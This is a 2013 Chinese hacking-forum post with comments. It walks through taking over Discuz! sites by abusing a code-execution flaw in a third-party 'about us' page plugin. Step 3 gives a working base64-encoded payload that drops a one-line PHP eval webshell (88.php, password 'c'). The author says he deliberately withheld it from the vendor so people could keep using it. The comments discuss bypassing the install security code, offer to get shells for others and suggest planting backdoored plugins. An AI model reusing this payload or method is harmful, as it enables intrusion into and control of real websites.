具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shell,这个已经在手里 很久了,但是使用其拿shell,也没几次,没事写出来,大家乐乐,别忘记感谢。

这个方法,就是需要 zend 支持【插件zend加密】,当然我还有一个不需要ZEND支持的,都是 app第三方的插件问题。

下面我来说说过程吧!

1.安装 zend 权限检查插件,因为后面利用到的插件是zend加密的,只要装了这个插件,后面的插件才能正常安装!

http://addon.discuz.com/?@study_zendcheck.pack

2.安装雨哲关于我们单页插件。 【[i][/i]ps:雨哲的好几个插件都有这个代码执行漏洞,自己发掘~!】

插件 - 雨哲关于我们单页 v5.6

3.页面管理,随便编辑一个页面,注意到了吧,没错,任意代码执行,下面我们就让生成一个小马

我插入:

fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));

然后我提交!

页面管理 - 插件 - 雨哲关于我们单页 v5.6

4.保存好后,我们点预览刚才编辑的页面,如图:

预览刚才编辑的页面

5.来看看我们的成果,会在根目录下面生成:88.php 密码为:c

无图无真相,翠花上图:

在根目录下面生成:88.php

本来想先通知厂家的,厂家一下下架了,大家就没得玩了,所以就放在技术社区里面,大家觉得能用上,也点 感谢 下。

还有一个不需要 zend权限的插件,能直接上传任何后缀名的文件,看感谢情况而定,是否发出。

还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下,进入后台后 拿shell 的办法。这次就不说了!

[原文地址]

相关讨论:

11#

木易耳朵 | 2013-07-21 00:23

安装插件需要有安全码啊。不通用。即使你的账户是创始人,没有安全码你也不能安装插件。

12#

江南的鱼 | 2013-07-21 00:36

自己有没测试,安全码是在论坛端还是在插件端设置的?为毛我试了好多都没要安全码?我本地下载安装也没有安全码,如果是在dz官方插件注册用户绑定了域名,这个域名对应一个帐号,而没绑定域名的可以不要安全码安装,我想改下host文件就绕过了,当然要看这个安全码是哪个了,请说明安全码是哪来的,怎么设置的,才能想到绕过的办法

14#

木易耳朵 | 2013-07-21 08:45

@江南的鱼 我日的一个企业大客户版,就是官方报价几十万的那种。安装插件是要确认安全码的。这个安全码可以重设,但是要在网站目录上传一个txt验证文件后才可以重新设置。

16#

苦战 | 2013-07-21 10:05

不通用 安全码是硬伤 不解释

17#

debug | 2013-07-21 10:47

哈哈 还有几个插件也是。。。 拿着很久了

18#

江南的鱼 | 2013-07-21 11:01

@木易耳朵 如果需要,可以联系我帮你拿shell

20#

Yaseng (看黄片 到 www.yaseng.me) | 2013-07-21 13:51

我会说 可以自己提交带后门的插件玩玩

留言评论(旧系统):

色魔科技 @ 2013-07-22 15:50:03

我靠。。威武啊。。。佩服

本站回复:

……

kyocc @ 2014-08-21 23:13:08

这玩意到现在还能安装。并且还可以轻易得到webshell。。。太强大了。。不过遇到的网站都不允许目录执行。。完全没办法搞。。

本站回复:

-_-|||